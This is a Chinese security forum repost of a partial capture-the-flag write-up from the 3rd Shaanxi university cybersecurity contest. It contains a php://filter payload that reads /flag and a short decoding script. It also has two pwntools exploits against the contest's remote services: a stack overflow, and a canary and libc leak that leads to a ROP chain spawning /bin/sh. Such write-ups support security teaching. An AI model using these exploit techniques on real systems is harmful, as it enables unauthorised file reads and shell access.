安全矩阵

 找回密码
 立即注册
搜索
查看: 605|回复: 0

第三届陕西大学生网安技能大赛部分WP

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2023-6-4 22:31:52 | 显示全部楼层 |阅读模式
本帖最后由 luozhenni 于 2023-6-4 22:31 编辑

第三届陕西大学生网安技能大赛部分WP

原文链接:第三届陕西大学生网安技能大赛部分WP
原创  奋斗的小浪   衡阳信安     2023-06-04 20:37 发表于湖南  



团队成员Laela带着两位大一的新人,打了这场比赛,选择的是职业院校组,一看是某草的平台,怪不到到了下午,Web题目就集体下线,在重新上线。最后成绩,到了下午就掉下来了,全国排名34,也算一个中等的成绩吧,毕竟老带新,自己做,也是需要时间的
WEBEzRCE1.




2.




3.?PK=php://filter/read=convert.base64-encode/resource=/flag
Misc云缨

1.



2.


  1. a='8881088410842088810810842042108108821041010882108881'                  
  2. s=a.split('0')                  
  3. print(s)                  
  4. l=[]                  
  5. for i in s:                  
  6.     sum=0                  
  7.     for j in i:                  
  8.         sum+=eval(j)                  
  9.     l.append(chr(sum+64))                  
  10. print(''.join(l))
复制代码
PWN
stack


  1. from pwn import *               
  2.                
  3. #p=process('nc 60.204.130.55 10005 ',shell=True)               
  4.                
  5. p=remote('60.204.130.55',10005)               
  6. p.recvuntil('?\n')               
  7. p.sendline('a')               
  8.                
  9. p.recvuntil('?\n')               
  10. payload='a'*152+p64(0x00000000004005d6)+p64(0x40082d)               
  11. p.sendline(payload)               
  12. p.interactive()   
复制代码
canary


  1. from pwn import *               
  2. import ctypes               
  3. context.log_level='debug'               
  4. pop_rdi=0x0000000000400b93               
  5. p=process('nc 60.204.130.55 10004 ',shell=True)               
  6. p.recvuntil(':')               
  7. p.sendline('1')               
  8. p.recvuntil('Game Go:\n')               
  9. libb=ELF('/lib/x86_64-linux-gnu/libc.so.6')               
  10. libc=ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')               
  11. seed=libc.time(0)               
  12. libc.srand(seed)               
  13.                
  14. p.sendline(str(libc.rand() % 100 + 1))               
  15. p.recv(0x48)               
  16. canary=u64(p.recv(8))               
  17. p.recv(8)               
  18. libcbase=u64(p.recvuntil(b'\x7f').ljust(8,b'\x00'))-171408               
  19. print(hex(libcbase))               
  20. system=libb.sym['system']+libcbase               
  21. binsh=libcbase+0x00000000001d8698               
  22. payload=b'a'*0x28+p64(canary)+p64(0x0)+p64(0x000000000040073e)+p64(pop_rdi)+p64(binsh)+p64(system)               
  23. p.sendline(payload)               
  24. p.interactive()
复制代码


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 16:01 , Processed in 0.012621 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表